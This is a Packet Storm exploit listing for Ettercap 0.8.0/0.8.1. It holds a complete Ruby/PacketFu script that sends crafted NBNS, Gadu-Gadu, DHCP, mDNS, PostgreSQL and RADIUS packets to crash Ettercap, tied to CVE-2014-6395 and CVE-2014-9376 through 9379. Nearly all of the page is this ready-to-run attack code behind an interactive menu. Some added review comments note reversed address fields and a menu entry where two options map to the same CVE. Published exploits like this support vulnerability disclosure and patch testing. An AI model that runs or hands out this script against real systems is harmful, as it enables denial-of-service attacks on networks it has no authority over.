
Ettercap 0.8.0 / 0.8.1 Denial Of Service

🗓️ 20 Dec 2014 00:00:00Reported by Nick SampanisType 
packetstorm
 packetstorm

Ettercap 0.8.0 / 0.8.1 Denial Of Service Exploit

Related
0day.today
Ettercap 0.8.0 / 0.8.1 Denial Of Service Exploit
21 Dec 201400:00
zdt
ArchLinux
ettercap: multiple issues
17 Mar 201500:00
archlinux
ArchLinux
ettercap-gtk: multiple issues
17 Mar 201500:00
archlinux
CNVD
Ettercap Heap Buffer Overflow Vulnerability
26 Dec 201400:00
cnvd
CVE
CVE-2014-6395
19 Dec 201415:00
cve
CVE
CVE-2014-9376
19 Dec 201415:00
cve
CVE
CVE-2014-9377
19 Dec 201415:00
cve
CVE
CVE-2014-9378
19 Dec 201415:00
cve
CVE
CVE-2014-9379
19 Dec 201415:00
cve
Cvelist
CVE-2014-6395
19 Dec 201415:00
cvelist
`#Exploit Title: 6 Remote ettercap Dos exploits to 1  
#Date: 19/12/2014  
#Exploit Author: Nick Sampanis  
#Vendor Homepage: http://ettercap.github.io  
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz  
#Version: 8.0-8.1  
#Tested on: Linux  
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379  
#Make sure that you have installed packetfu and pcaprub  
  
require 'packetfu'  
include PacketFu  
  
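# Argument check. Every packet helper below reads ARGV[0..3] directly
# (src_ip dst_ip src_mac iface), so refuse to continue with fewer than four.
# Exit with a non-zero status so a caller or wrapper script can tell a usage
# error apart from a normal run (the original used a bare `exit`, i.e. status 0).
if ARGV.length < 4
  puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
  puts "[-]Use valid mac for your interface, if you dont know"+
  " victim's ip address use broadcast"
  exit 1
end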
  
# Writes one UDP frame to port 137 (NBNS) on the interface named by ARGV[3].
# Ethernet source is ARGV[2] and the Ethernet destination is broadcast; the IP
# source is ARGV[0] and the IP destination ARGV[1], as in the usage line above.
# The payload chunks keep the field labels from the original listing; the
# trailing "A" * 1000 is filler appended after the class field.
def nbns_header
  pkt = UDPPacket.new
  pkt.eth_saddr = ARGV[2]
  pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
  pkt.ip_daddr = ARGV[1]
  pkt.ip_saddr = ARGV[0]
  pkt.udp_src = 4444
  pkt.udp_dst = 137
  pkt.payload = [
    "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00",
    "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46", # name
    "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43", # name
    "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00",         # name
    "\x00\x20",  # type
    "\x00\x01",  # class
    "A" * 1000   # pad
  ].join
  # Let PacketFu fix up the derived header fields (lengths/checksums) before writing.
  pkt.recalc
  pkt.to_w(ARGV[3])
end
# Writes one TCP frame to port 8074 on the interface named by ARGV[3], with
# Ethernet source ARGV[2], broadcast Ethernet destination, IP source ARGV[0]
# and IP destination ARGV[1]. The payload is the two labelled 4-byte fields
# from the original listing followed by 1000 bytes of "A" filler.
def gg_client
  pkt = TCPPacket.new
  pkt.eth_saddr = ARGV[2]
  pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
  pkt.ip_saddr = ARGV[0]
  pkt.ip_daddr = ARGV[1]
  pkt.tcp_src = 3333
  pkt.tcp_dst = 8074
  pkt.payload = [
    "\x15\x00\x00\x00", # gg_type
    "\xe8\x03\x00\x00", # gg_len
    "A" * 1000
  ].join
  # Let PacketFu fix up the derived header fields (lengths/checksums) before writing.
  pkt.recalc
  pkt.to_w(ARGV[3])
end
# Writes one UDP frame from port 67 to port 4444 on the interface named by
# ARGV[3]. NOTE(review): unlike most helpers in this file the IP addresses are
# reversed — ip_saddr is ARGV[1] (the dst_ip argument) and ip_daddr is ARGV[0]
# — so the frame is emitted as if it came from the dst host; the script does
# not say why, so verify the intent before relying on the direction.
# The payload keeps the two labelled fields from the original listing.
def dhcp_header
  pkt = UDPPacket.new
  pkt.eth_saddr = ARGV[2]
  pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
  pkt.ip_daddr = ARGV[0]
  pkt.ip_saddr = ARGV[1]
  pkt.udp_src = 67
  pkt.udp_dst = 4444
  pkt.payload = [
    "\x02" * 236,
    "\x63\x82\x53\x63",
    "\x35",
    "\x00\x05\x00",
    "\x51",
    "\x00",   # size
    "A" * 3   # pad
  ].join
  # Let PacketFu fix up the derived header fields (lengths/checksums) before writing.
  pkt.recalc
  pkt.to_w(ARGV[3])
end
  
# Writes one UDP frame to port 5353 on the interface named by ARGV[3], with
# Ethernet source ARGV[2], broadcast Ethernet destination, IP source ARGV[0]
# and IP destination ARGV[1]. The payload is a DNS-style header (labels kept
# from the original listing) followed by one question for "router.local".
def mdns_header
  pkt = UDPPacket.new
  pkt.eth_saddr = ARGV[2]
  pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
  pkt.ip_daddr = ARGV[1]
  pkt.ip_saddr = ARGV[0]
  pkt.udp_src = 4444
  pkt.udp_dst = 5353
  pkt.payload = [
    "\x11\x11",                   # id
    "\x00\x00",                   # flags
    "\x00\x01",                   # questions
    "\x00\x00",                   # answer_rr
    "\x00\x00",                   # auth_rrs
    "\x00\x00",                   # additional_rr
    "\x06router\x05local\x00",    # name
    "\x00\x01",                   # type
    "\x00\x01"                    # class
  ].join
  # Let PacketFu fix up the derived header fields (lengths/checksums) before writing.
  pkt.recalc
  pkt.to_w(ARGV[3])
end
# Writes a second UDP frame to port 5353 on the interface named by ARGV[3],
# addressed like mdns_header (Ethernet source ARGV[2], broadcast destination,
# IP ARGV[0] -> ARGV[1]). The header fields match mdns_header; the name field
# is the single byte "\x01", followed by type/class and 500 bytes of "A" filler.
def mdns_dos_header
  pkt = UDPPacket.new
  pkt.eth_saddr = ARGV[2]
  pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
  pkt.ip_daddr = ARGV[1]
  pkt.ip_saddr = ARGV[0]
  pkt.udp_src = 4444
  pkt.udp_dst = 5353
  pkt.payload = [
    "\x11\x11",   # id
    "\x00\x00",   # flags
    "\x00\x01",   # questions
    "\x00\x00",   # answer_rr
    "\x00\x00",   # auth_rrs
    "\x00\x00",   # additional_rr
    "\x01",
    "\x00\x01",   # type
    "\x00\x01",   # class
    "A" * 500
  ].join
  # Let PacketFu fix up the derived header fields (lengths/checksums) before writing.
  pkt.recalc
  pkt.to_w(ARGV[3])
end
  
# Writes one TCP frame from port 5432 to port 3333 on the interface named by
# ARGV[3]. NOTE(review): as in dhcp_header the IP addresses are reversed
# relative to the other helpers — ip_saddr is ARGV[1] and ip_daddr is ARGV[0]
# — so this frame is emitted as if sent by the dst host (the 5432 source port
# suggests a server-side message); verify the intended direction.
# The payload is the fixed byte string from the original listing, unchanged.
def pgsql_server
  pkt = TCPPacket.new
  pkt.eth_saddr = ARGV[2]
  pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
  pkt.ip_saddr = ARGV[1]
  pkt.ip_daddr = ARGV[0]
  pkt.tcp_src = 5432
  pkt.tcp_dst = 3333
  pkt.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
  # Let PacketFu fix up the derived header fields (lengths/checksums) before writing.
  pkt.recalc
  pkt.to_w(ARGV[3])
end
# Writes one TCP frame from port 3333 to port 5432 on the interface named by
# ARGV[3], with Ethernet source ARGV[2], broadcast Ethernet destination, IP
# source ARGV[0] and IP destination ARGV[1]. The payload is the fixed byte
# string from the original listing, unchanged.
def pgsql_client
  pkt = TCPPacket.new
  pkt.eth_saddr = ARGV[2]
  pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
  pkt.ip_saddr = ARGV[0]
  pkt.ip_daddr = ARGV[1]
  pkt.tcp_src = 3333
  pkt.tcp_dst = 5432
  pkt.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
  # Let PacketFu fix up the derived header fields (lengths/checksums) before writing.
  pkt.recalc
  pkt.to_w(ARGV[3])
end
  
# Writes one TCP frame from port 3333 to port 5432 on the interface named by
# ARGV[3], addressed like pgsql_client (Ethernet source ARGV[2], broadcast
# destination, IP ARGV[0] -> ARGV[1]). The payload is a one-byte leader, the
# labelled 4-byte length field, 1000 bytes of "A" filler and a NUL terminator.
def pgsql_client_shell
  pkt = TCPPacket.new
  pkt.eth_saddr = ARGV[2]
  pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
  pkt.ip_saddr = ARGV[0]
  pkt.ip_daddr = ARGV[1]
  pkt.tcp_src = 3333
  pkt.tcp_dst = 5432
  pkt.payload = [
    "\x70",
    "\x00\x00\x03\xe9", # len
    "A" * 1000,
    "\x00"
  ].join
  # Let PacketFu fix up the derived header fields (lengths/checksums) before writing.
  pkt.recalc
  pkt.to_w(ARGV[3])
end
  
# Writes one UDP frame to port 1645 on the interface named by ARGV[3], with
# Ethernet source ARGV[2], broadcast Ethernet destination, IP source ARGV[0]
# and IP destination ARGV[1]. The payload is the fixed byte string from the
# original listing, unchanged.
def radius_header
  pkt = UDPPacket.new
  pkt.eth_saddr = ARGV[2]
  pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
  pkt.ip_daddr = ARGV[1]
  pkt.ip_saddr = ARGV[0]
  pkt.udp_src = 4444
  pkt.udp_dst = 1645
  pkt.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
  # Let PacketFu fix up the derived header fields (lengths/checksums) before writing.
  pkt.recalc
  pkt.to_w(ARGV[3])
end
  
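# Interactive menu: print the six options, read one number from stdin and
# dispatch to the matching packet helper(s) defined above.
# NOTE(review): options 2 and 3 both print CVE-2014-9376; the mapping between
# menu entries and CVE ids is not verifiable from this script alone — check
# against the advisories listed on the page before quoting it.
puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
puts "[+]-1- nbns plugin CVE-2014-9377"
puts "[+]-2- gg dissector CVE-2014-9376"
puts "[+]-3- dhcp dissector CVE-2014-9376"
puts "[+]-4- mdns plugin CVE-2014-9378"
puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
puts "[+]-6- radius dissector CVE-2014-9379"
print "choice:"
# gets returns nil on EOF (closed or exhausted stdin); to_s turns that into ""
# so the script reaches the "Unrecognized command" branch instead of raising
# NoMethodError on nil.chomp. Non-numeric input still parses to 0 via to_i.
choice = $stdin.gets.to_s.chomp.to_i

case choice
when 1
  puts "[+]Sending nbns packet.."
  nbns_header
when 2
  puts "[+]Sending client gg packet.."
  gg_client
when 3
  puts "[+]Sending dhcp packet.."
  dhcp_header
when 4
  puts "[+]Sending mdns packet.."
  mdns_header
  mdns_dos_header
when 5
  puts "[+]Sending pgsql packet.."
  pgsql_client
  pgsql_server
  pgsql_client_shell
when 6
  puts "[+]Sending radius packet.."
  radius_header
else
  puts "[-]Unrecognized command "
end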
  
  
`
